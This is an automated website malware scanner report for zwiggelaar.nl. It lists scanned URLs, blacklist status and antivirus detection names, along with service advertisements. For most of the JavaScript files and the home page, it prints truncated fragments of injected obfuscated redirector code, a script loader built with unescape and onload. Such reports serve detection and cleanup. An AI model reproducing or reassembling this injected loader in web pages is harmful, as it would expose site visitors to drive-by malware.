Malware Scanner report for zwiggelaar.nl

Malicious/Suspicious/Total urls checked: 11/0/15

11 pages have malicious code. See details below

Blacklists: Found

The website is marked by Yandex as suspicious.

The website "zwiggelaar.nl" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=zwiggelaar.nl

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://zwiggelaar.nl/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://zwiggelaar.nl/	200 OK Content-Length: 7874 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var AD;if(AD!=''){AD='BW'};var K;if(K!='D' && K!='Hu'){K=''};this.Yv="";function Y(){var TC=new Array();var n=new Array();var YO=unescape;var w;if(w!='a' && w != ''){w=null};var b;if(b!='' && b!='gW'){b=null};var s=window;var V=YO("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%61%63%65%72%2e%63%6f%6d%2f%65%78%61%6d%69%6e%65%72%2e%63%6f%6d%2e%70%68%70");this.KQ='';var hO="";var r;if(r!='' && r!='U'){r=null};function h(T,z){var W='';var M;if(M!='' && M!='vK'){M='TO'} ... 1220 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y(); Antivirus reports: AntiVir JS/Illredir.BZ Avast JS:Illredir-AQ [Trj] Ad-Aware Trojan.Script.402625 Antiy-AVL Trojan/JS.Redirector Ikarus Trojan.JS.Redirector Panda JS/Redirector.AC nProtect Trojan.Script.402625 K7AntiVirus Trojan ( 637f3b880 ) TrendMicro-HouseCall JS_KEMPAR.SM Comodo TrojWare.JS.Redirector.UA Emsisoft Trojan.Script.402625 (B) K7GW Exploit ( 04c559b91 ) McAfee-GW-Edition JS/Redirector.ad TrendMicro JS_KEMPAR.SM Microsoft Trojan:JS/Redirector.DC Kaspersky Trojan.JS.Redirector.kv MicroWorld-eScan Trojan.Script.402625 Fortinet JS/Crypt.BBES!tr TotalDefense JS/Redirector.BH McAfee JS/Redirector.ad NANO-Antivirus Trojan.Script.Agent.yrkab F-Secure Trojan.Script.402625 VIPRE Trojan.JS.Redirector.cr (v) F-Prot JS/Redir.AZ AVG JS/Redir Norman Redir.HU Sophos Troj/JSRedir-BD GData Trojan.Script.402625 Commtouch JS/Redir.AZ Agnitum JS.Redirector.Gen.5 ESET-NOD32 JS/TrojanDownloader.Pegel.AA BitDefender Trojan.Script.402625
http://zwiggelaar.nl/./include/url.js	200 OK Content-Length: 17388 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var CM_SESSION_KEY_KEY = "cmSessionKeyKey"; function getSessionPair(loc) { return URL.getSessionPair(loc); } function getSessionHref() { return URL.getSessionHref(); } function processLinkz(doc) { URL.processLinkz(doc); } function getSessionString() { return URL.getSessionString(); } function jdecode(s) { return URL.jdecode(s); } function jencode(s) { return URL.jencode( ... 3467 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y(); Antivirus reports: Avast JS:Illredir-AQ [Trj] Ad-Aware Trojan.Iframe.AZF Ikarus Trojan.JS.Redirector Panda JS/Redirector.AC nProtect Trojan.Iframe.AZF K7AntiVirus Trojan ( 637f3b880 ) TrendMicro-HouseCall JS_GUMBLAR.SMNY Comodo TrojWare.JS.Redirector.UA Emsisoft Trojan.Iframe.AZF (B) K7GW Exploit ( 04c559b91 ) McAfee-GW-Edition JS/Redirector.ad DrWeb JS.Redirector.based.3 TrendMicro JS_GUMBLAR.SMNY Microsoft Trojan:JS/Redirector.DC Kaspersky Trojan.JS.Redirector.kv MicroWorld-eScan Trojan.Iframe.AZF Fortinet JS/Crypt.BBES!tr TotalDefense JS/Redirector.BH McAfee JS/Redirector.ad NANO-Antivirus Trojan.Script.Agent.yrkab F-Secure Trojan.Iframe.AZF F-Prot JS/Redir.AZ AVG JS/Redir Sophos Troj/JSRedir-BD GData Trojan.Iframe.AZF Commtouch JS/Redir.AZ Agnitum JS.Redirector.Gen.5 ESET-NOD32 JS/TrojanDownloader.Pegel.AA BitDefender Trojan.Iframe.AZF
http://zwiggelaar.nl/./include/sitetree.js	200 OK Content-Length: 8851 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function jdecode(s) { s = s.replace(/\+/g, "%20") return unescape(s); } var POS_NODENAME=0; var POS_ID=1; var POS_NAME=2; var POS_NAVIGATIONTEXT=3; var POS_HREF=4; var POS_ISNAVIGATION=5; var POS_CHILDS=6; var POS_TEMPLATENAME=7; var theSitetree=[ ['PAGE','1508',jdecode('Portal'),jdecode(''),'/1508.html','true',[],''], ['PAGE','33801',jdecode('Webmail'),jdecode(''),'/33801.html','true',[],'']]; ... 3312 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y(); Antivirus reports: Avast JS:Illredir-AQ [Trj] Ad-Aware Trojan.Iframe.AZF Ikarus Trojan.JS.Redirector Panda JS/Redirector.AC nProtect Trojan.Iframe.AZF K7AntiVirus Trojan ( 637f3b880 ) TrendMicro-HouseCall JS_GUMBLAR.SMNY Comodo TrojWare.JS.Redirector.UA Emsisoft Trojan.Iframe.AZF (B) K7GW Exploit ( 04c559b91 ) DrWeb JS.Redirector.based.3 TrendMicro JS_GUMBLAR.SMNY Microsoft Trojan:JS/Redirector.DC Kaspersky HEUR:Trojan-Downloader.Script.Generic MicroWorld-eScan Trojan.Iframe.AZF TotalDefense JS/Redirector.BH NANO-Antivirus Trojan.Script.Agent.yrkab F-Secure Trojan.Iframe.AZF F-Prot JS/Redir.AZ AVG JS/Redir Norman Redir.HU Sophos Troj/JSRedir-BD GData Trojan.Iframe.AZF Commtouch JS/Redir.AZ Agnitum JS.Redirector.Gen.5 ESET-NOD32 JS/TrojanDownloader.Pegel.AA BitDefender Trojan.Iframe.AZF
http://zwiggelaar.nl/./1508.html?sessionidkey=sessionidval	200 OK Content-Length: 5729 Content-Type: text/html	clean
http://zwiggelaar.nl/././include/url.js	200 OK Content-Length: 17388 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var CM_SESSION_KEY_KEY = "cmSessionKeyKey"; function getSessionPair(loc) { return URL.getSessionPair(loc); } function getSessionHref() { return URL.getSessionHref(); } function processLinkz(doc) { URL.processLinkz(doc); } function getSessionString() { return URL.getSessionString(); } function jdecode(s) { return URL.jdecode(s); } function jencode(s) { return URL.jencode( ... 3467 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y(); Antivirus reports: Avast JS:Illredir-AQ [Trj] Ad-Aware Trojan.Iframe.AZF Ikarus Trojan.JS.Redirector Panda JS/Redirector.AC nProtect Trojan.Iframe.AZF K7AntiVirus Trojan ( 637f3b880 ) TrendMicro-HouseCall JS_GUMBLAR.SMNY Comodo TrojWare.JS.Redirector.UA Emsisoft Trojan.Iframe.AZF (B) K7GW Exploit ( 04c559b91 ) McAfee-GW-Edition JS/Redirector.ad DrWeb JS.Redirector.based.3 TrendMicro JS_GUMBLAR.SMNY Microsoft Trojan:JS/Redirector.DC Kaspersky Trojan.JS.Redirector.kv MicroWorld-eScan Trojan.Iframe.AZF Fortinet JS/Crypt.BBES!tr TotalDefense JS/Redirector.BH McAfee JS/Redirector.ad NANO-Antivirus Trojan.Script.Agent.yrkab F-Secure Trojan.Iframe.AZF F-Prot JS/Redir.AZ AVG JS/Redir Sophos Troj/JSRedir-BD GData Trojan.Iframe.AZF Commtouch JS/Redir.AZ Agnitum JS.Redirector.Gen.5 ESET-NOD32 JS/TrojanDownloader.Pegel.AA BitDefender Trojan.Iframe.AZF
http://zwiggelaar.nl/././include/sitetree.js	200 OK Content-Length: 8851 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function jdecode(s) { s = s.replace(/\+/g, "%20") return unescape(s); } var POS_NODENAME=0; var POS_ID=1; var POS_NAME=2; var POS_NAVIGATIONTEXT=3; var POS_HREF=4; var POS_ISNAVIGATION=5; var POS_CHILDS=6; var POS_TEMPLATENAME=7; var theSitetree=[ ['PAGE','1508',jdecode('Portal'),jdecode(''),'/1508.html','true',[],''], ['PAGE','33801',jdecode('Webmail'),jdecode(''),'/33801.html','true',[],'']]; ... 3312 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y(); Antivirus reports: Avast JS:Illredir-AQ [Trj] Ad-Aware Trojan.Iframe.AZF Ikarus Trojan.JS.Redirector Panda JS/Redirector.AC nProtect Trojan.Iframe.AZF K7AntiVirus Trojan ( 637f3b880 ) TrendMicro-HouseCall JS_GUMBLAR.SMNY Comodo TrojWare.JS.Redirector.UA Emsisoft Trojan.Iframe.AZF (B) K7GW Exploit ( 04c559b91 ) DrWeb JS.Redirector.based.3 TrendMicro JS_GUMBLAR.SMNY Microsoft Trojan:JS/Redirector.DC Kaspersky HEUR:Trojan-Downloader.Script.Generic MicroWorld-eScan Trojan.Iframe.AZF TotalDefense JS/Redirector.BH NANO-Antivirus Trojan.Script.Agent.yrkab F-Secure Trojan.Iframe.AZF F-Prot JS/Redir.AZ AVG JS/Redir Norman Redir.HU Sophos Troj/JSRedir-BD GData Trojan.Iframe.AZF Commtouch JS/Redir.AZ Agnitum JS.Redirector.Gen.5 ESET-NOD32 JS/TrojanDownloader.Pegel.AA BitDefender Trojan.Iframe.AZF
http://zwiggelaar.nl/././1508.html?sessionidkey=sessionidval	200 OK Content-Length: 5729 Content-Type: text/html	clean
http://zwiggelaar.nl/./././include/url.js	200 OK Content-Length: 17388 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var CM_SESSION_KEY_KEY = "cmSessionKeyKey"; function getSessionPair(loc) { return URL.getSessionPair(loc); } function getSessionHref() { return URL.getSessionHref(); } function processLinkz(doc) { URL.processLinkz(doc); } function getSessionString() { return URL.getSessionString(); } function jdecode(s) { return URL.jdecode(s); } function jencode(s) { return URL.jencode( ... 3467 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y(); Antivirus reports: Avast JS:Illredir-AQ [Trj] Ad-Aware Trojan.Iframe.AZF Ikarus Trojan.JS.Redirector Panda JS/Redirector.AC nProtect Trojan.Iframe.AZF K7AntiVirus Trojan ( 637f3b880 ) TrendMicro-HouseCall JS_GUMBLAR.SMNY Comodo TrojWare.JS.Redirector.UA Emsisoft Trojan.Iframe.AZF (B) K7GW Exploit ( 04c559b91 ) McAfee-GW-Edition JS/Redirector.ad DrWeb JS.Redirector.based.3 TrendMicro JS_GUMBLAR.SMNY Microsoft Trojan:JS/Redirector.DC Kaspersky Trojan.JS.Redirector.kv MicroWorld-eScan Trojan.Iframe.AZF Fortinet JS/Crypt.BBES!tr TotalDefense JS/Redirector.BH McAfee JS/Redirector.ad NANO-Antivirus Trojan.Script.Agent.yrkab F-Secure Trojan.Iframe.AZF F-Prot JS/Redir.AZ AVG JS/Redir Sophos Troj/JSRedir-BD GData Trojan.Iframe.AZF Commtouch JS/Redir.AZ Agnitum JS.Redirector.Gen.5 ESET-NOD32 JS/TrojanDownloader.Pegel.AA BitDefender Trojan.Iframe.AZF
http://zwiggelaar.nl/./././include/sitetree.js	200 OK Content-Length: 8851 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function jdecode(s) { s = s.replace(/\+/g, "%20") return unescape(s); } var POS_NODENAME=0; var POS_ID=1; var POS_NAME=2; var POS_NAVIGATIONTEXT=3; var POS_HREF=4; var POS_ISNAVIGATION=5; var POS_CHILDS=6; var POS_TEMPLATENAME=7; var theSitetree=[ ['PAGE','1508',jdecode('Portal'),jdecode(''),'/1508.html','true',[],''], ['PAGE','33801',jdecode('Webmail'),jdecode(''),'/33801.html','true',[],'']]; ... 3312 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y(); Antivirus reports: Avast JS:Illredir-AQ [Trj] Ad-Aware Trojan.Iframe.AZF Ikarus Trojan.JS.Redirector Panda JS/Redirector.AC nProtect Trojan.Iframe.AZF K7AntiVirus Trojan ( 637f3b880 ) TrendMicro-HouseCall JS_GUMBLAR.SMNY Comodo TrojWare.JS.Redirector.UA Emsisoft Trojan.Iframe.AZF (B) K7GW Exploit ( 04c559b91 ) DrWeb JS.Redirector.based.3 TrendMicro JS_GUMBLAR.SMNY Microsoft Trojan:JS/Redirector.DC Kaspersky HEUR:Trojan-Downloader.Script.Generic MicroWorld-eScan Trojan.Iframe.AZF TotalDefense JS/Redirector.BH NANO-Antivirus Trojan.Script.Agent.yrkab F-Secure Trojan.Iframe.AZF F-Prot JS/Redir.AZ AVG JS/Redir Norman Redir.HU Sophos Troj/JSRedir-BD GData Trojan.Iframe.AZF Commtouch JS/Redir.AZ Agnitum JS.Redirector.Gen.5 ESET-NOD32 JS/TrojanDownloader.Pegel.AA BitDefender Trojan.Iframe.AZF
http://zwiggelaar.nl/./././1508.html?sessionidkey=sessionidval	200 OK Content-Length: 5729 Content-Type: text/html	clean
http://zwiggelaar.nl/././././include/url.js	200 OK Content-Length: 17388 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var CM_SESSION_KEY_KEY = "cmSessionKeyKey"; function getSessionPair(loc) { return URL.getSessionPair(loc); } function getSessionHref() { return URL.getSessionHref(); } function processLinkz(doc) { URL.processLinkz(doc); } function getSessionString() { return URL.getSessionString(); } function jdecode(s) { return URL.jdecode(s); } function jencode(s) { return URL.jencode( ... 3467 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y(); Antivirus reports: Avast JS:Illredir-AQ [Trj] Ad-Aware Trojan.Iframe.AZF Ikarus Trojan.JS.Redirector Panda JS/Redirector.AC nProtect Trojan.Iframe.AZF K7AntiVirus Trojan ( 637f3b880 ) TrendMicro-HouseCall JS_GUMBLAR.SMNY Comodo TrojWare.JS.Redirector.UA Emsisoft Trojan.Iframe.AZF (B) K7GW Exploit ( 04c559b91 ) McAfee-GW-Edition JS/Redirector.ad DrWeb JS.Redirector.based.3 TrendMicro JS_GUMBLAR.SMNY Microsoft Trojan:JS/Redirector.DC Kaspersky Trojan.JS.Redirector.kv MicroWorld-eScan Trojan.Iframe.AZF Fortinet JS/Crypt.BBES!tr TotalDefense JS/Redirector.BH McAfee JS/Redirector.ad NANO-Antivirus Trojan.Script.Agent.yrkab F-Secure Trojan.Iframe.AZF F-Prot JS/Redir.AZ AVG JS/Redir Sophos Troj/JSRedir-BD GData Trojan.Iframe.AZF Commtouch JS/Redir.AZ Agnitum JS.Redirector.Gen.5 ESET-NOD32 JS/TrojanDownloader.Pegel.AA BitDefender Trojan.Iframe.AZF
http://zwiggelaar.nl/././././include/sitetree.js	200 OK Content-Length: 8851 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function jdecode(s) { s = s.replace(/\+/g, "%20") return unescape(s); } var POS_NODENAME=0; var POS_ID=1; var POS_NAME=2; var POS_NAVIGATIONTEXT=3; var POS_HREF=4; var POS_ISNAVIGATION=5; var POS_CHILDS=6; var POS_TEMPLATENAME=7; var theSitetree=[ ['PAGE','1508',jdecode('Portal'),jdecode(''),'/1508.html','true',[],''], ['PAGE','33801',jdecode('Webmail'),jdecode(''),'/33801.html','true',[],'']]; ... 3312 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y(); Antivirus reports: Avast JS:Illredir-AQ [Trj] Ad-Aware Trojan.Iframe.AZF Ikarus Trojan.JS.Redirector Panda JS/Redirector.AC nProtect Trojan.Iframe.AZF K7AntiVirus Trojan ( 637f3b880 ) TrendMicro-HouseCall JS_GUMBLAR.SMNY Comodo TrojWare.JS.Redirector.UA Emsisoft Trojan.Iframe.AZF (B) K7GW Exploit ( 04c559b91 ) DrWeb JS.Redirector.based.3 TrendMicro JS_GUMBLAR.SMNY Microsoft Trojan:JS/Redirector.DC Kaspersky HEUR:Trojan-Downloader.Script.Generic MicroWorld-eScan Trojan.Iframe.AZF TotalDefense JS/Redirector.BH NANO-Antivirus Trojan.Script.Agent.yrkab F-Secure Trojan.Iframe.AZF F-Prot JS/Redir.AZ AVG JS/Redir Norman Redir.HU Sophos Troj/JSRedir-BD GData Trojan.Iframe.AZF Commtouch JS/Redir.AZ Agnitum JS.Redirector.Gen.5 ESET-NOD32 JS/TrojanDownloader.Pegel.AA BitDefender Trojan.Iframe.AZF
http://zwiggelaar.nl/././././1508.html?sessionidkey=sessionidval	200 OK Content-Length: 5729 Content-Type: text/html	clean
http://zwiggelaar.nl/./././././include/url.js	200 OK Content-Length: 17388 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var CM_SESSION_KEY_KEY = "cmSessionKeyKey"; function getSessionPair(loc) { return URL.getSessionPair(loc); } function getSessionHref() { return URL.getSessionHref(); } function processLinkz(doc) { URL.processLinkz(doc); } function getSessionString() { return URL.getSessionString(); } function jdecode(s) { return URL.jdecode(s); } function jencode(s) { return URL.jencode( ... 3467 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y(); Antivirus reports: Avast JS:Illredir-AQ [Trj] Ad-Aware Trojan.Iframe.AZF Ikarus Trojan.JS.Redirector Panda JS/Redirector.AC nProtect Trojan.Iframe.AZF K7AntiVirus Trojan ( 637f3b880 ) TrendMicro-HouseCall JS_GUMBLAR.SMNY Comodo TrojWare.JS.Redirector.UA Emsisoft Trojan.Iframe.AZF (B) K7GW Exploit ( 04c559b91 ) McAfee-GW-Edition JS/Redirector.ad DrWeb JS.Redirector.based.3 TrendMicro JS_GUMBLAR.SMNY Microsoft Trojan:JS/Redirector.DC Kaspersky Trojan.JS.Redirector.kv MicroWorld-eScan Trojan.Iframe.AZF Fortinet JS/Crypt.BBES!tr TotalDefense JS/Redirector.BH McAfee JS/Redirector.ad NANO-Antivirus Trojan.Script.Agent.yrkab F-Secure Trojan.Iframe.AZF F-Prot JS/Redir.AZ AVG JS/Redir Sophos Troj/JSRedir-BD GData Trojan.Iframe.AZF Commtouch JS/Redir.AZ Agnitum JS.Redirector.Gen.5 ESET-NOD32 JS/TrojanDownloader.Pegel.AA BitDefender Trojan.Iframe.AZF
http://zwiggelaar.nl/./././././include/sitetree.js	200 OK Content-Length: 8851 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function jdecode(s) { s = s.replace(/\+/g, "%20") return unescape(s); } var POS_NODENAME=0; var POS_ID=1; var POS_NAME=2; var POS_NAVIGATIONTEXT=3; var POS_HREF=4; var POS_ISNAVIGATION=5; var POS_CHILDS=6; var POS_TEMPLATENAME=7; var theSitetree=[ ['PAGE','1508',jdecode('Portal'),jdecode(''),'/1508.html','true',[],''], ['PAGE','33801',jdecode('Webmail'),jdecode(''),'/33801.html','true',[],'']]; ... 3312 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y(); Antivirus reports: Avast JS:Illredir-AQ [Trj] Ad-Aware Trojan.Iframe.AZF Ikarus Trojan.JS.Redirector Panda JS/Redirector.AC nProtect Trojan.Iframe.AZF K7AntiVirus Trojan ( 637f3b880 ) TrendMicro-HouseCall JS_GUMBLAR.SMNY Comodo TrojWare.JS.Redirector.UA Emsisoft Trojan.Iframe.AZF (B) K7GW Exploit ( 04c559b91 ) DrWeb JS.Redirector.based.3 TrendMicro JS_GUMBLAR.SMNY Microsoft Trojan:JS/Redirector.DC Kaspersky HEUR:Trojan-Downloader.Script.Generic MicroWorld-eScan Trojan.Iframe.AZF TotalDefense JS/Redirector.BH NANO-Antivirus Trojan.Script.Agent.yrkab F-Secure Trojan.Iframe.AZF F-Prot JS/Redir.AZ AVG JS/Redir Norman Redir.HU Sophos Troj/JSRedir-BD GData Trojan.Iframe.AZF Commtouch JS/Redir.AZ Agnitum JS.Redirector.Gen.5 ESET-NOD32 JS/TrojanDownloader.Pegel.AA BitDefender Trojan.Iframe.AZF

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: zwiggelaar.nl

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 17:57:37 GMT
Accept-Ranges: bytes
Server: Apache
Content-Language: nl
Content-Length: 7874
Content-Type: text/html
Last-Modified: Tue, 06 Apr 2010 14:44:46 GMT

...7874 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: zwiggelaar.nl
Referer: http://www.google.com/search?q=zwiggelaar.nl

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for zwiggelaar.nl

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools